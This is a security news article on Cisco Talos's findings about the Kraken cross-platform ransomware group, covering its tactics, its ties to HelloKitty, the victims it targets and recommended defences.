Cisco Talos has identified an emerging threat from Kraken, a sophisticated cross-platform ransomware group that has emerged from the remnants of the HelloKitty ransomware cartel.
In August 2025, the security firm observed the Russian-speaking group conducting big-game hunting and double-extortion attacks against enterprise environments worldwide.
Kraken represents a significant evolution in ransomware threats due to its multi-platform capabilities.
Unlike traditional ransomware families that target a single operating system, Kraken features distinct encryptors engineered explicitly for Windows, Linux, and VMware ESXi systems.
This architectural approach allows the group to maximize damage across diverse infrastructure environments, from traditional servers to virtualized ecosystems.
According to Talos incident response observations, Kraken’s infection chain begins with the exploitation of Server Message Block (SMB) vulnerabilities on internet-exposed servers. Once initial access is established, attackers extract privileged credentials before re-entering the victim environment via Remote Desktop Protocol connections.
The group leverages Cloudflared for persistence and SSH Filesystem (SSHFS) for data exfiltration before initiating encryption a tactical approach that demonstrates operational sophistication.
The group employs a double extortion model, combining encryption with data theft. Victims are threatened with public disclosure on Kraken’s data leak site if ransom demands are not met. In observed cases, the group has demanded approximately 1 million USD in Bitcoin, with assurances of decryption and non-disclosure following payment.
Notable Technical Capabilities
Kraken ransomware incorporates a distinctive feature rarely observed in modern ransomware: encryption benchmarking.
Before initiating the actual encryption process, the malware tests the victim machine’s performance to optimize the attack.
This capability allows operators to determine whether to execute full or partial encryption based on available resources, maximizing operational efficiency while minimizing detection risk through resource exhaustion.
The Windows variant is a 32-bit executable written in C++ and employs sophisticated anti-analysis techniques, including control flow obfuscation, WoW64 redirection manipulation, and exception handler tampering.
The ransomware turns off Windows Backup services, removes system restore points, and deletes the recycle bin to prevent recovery. It specifically targets SQL databases and network shares while preserving executable and library files to allow victims to communicate with attackers.
The Linux and ESXi variants demonstrate platform-specific adaptations, with automatic system type detection and corresponding behavioral modifications.
On ESXi systems, the malware forcefully terminates running virtual machines before encryption. Both variants employ multi-threaded encryption using RSA-4096 and ChaCha20 algorithms, appending the .zpsc file extension to encrypted files.
Intelligence suggests Kraken emerged from HelloKitty operators, supported by identical ransom note filenames and explicit references to HelloKitty within Kraken’s data leak site.
Geographic Scope
In September 2025, Kraken announced “The Last Haven Board,” a new underground forum designed for anonymous cybercriminal communication.
The announcement noted support from HelloKitty operators and WeaCorp, an exploit buyer organization, further establishing potential ties to established ransomware infrastructure.
Kraken demonstrates opportunistic targeting without concentration on specific business verticals. Documented victims span multiple geographies including the United States, United Kingdom, Canada, Denmark, Panama, and Kuwait, indicating a broadly indiscriminate approach to target selection.
Organizations should implement robust SMB network segmentation, maintain current backup systems isolated from production networks, enforce multi-factor authentication, and deploy behavioral detection tools capable of identifying ransomware execution patterns across Windows, Linux, and virtualization platforms.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.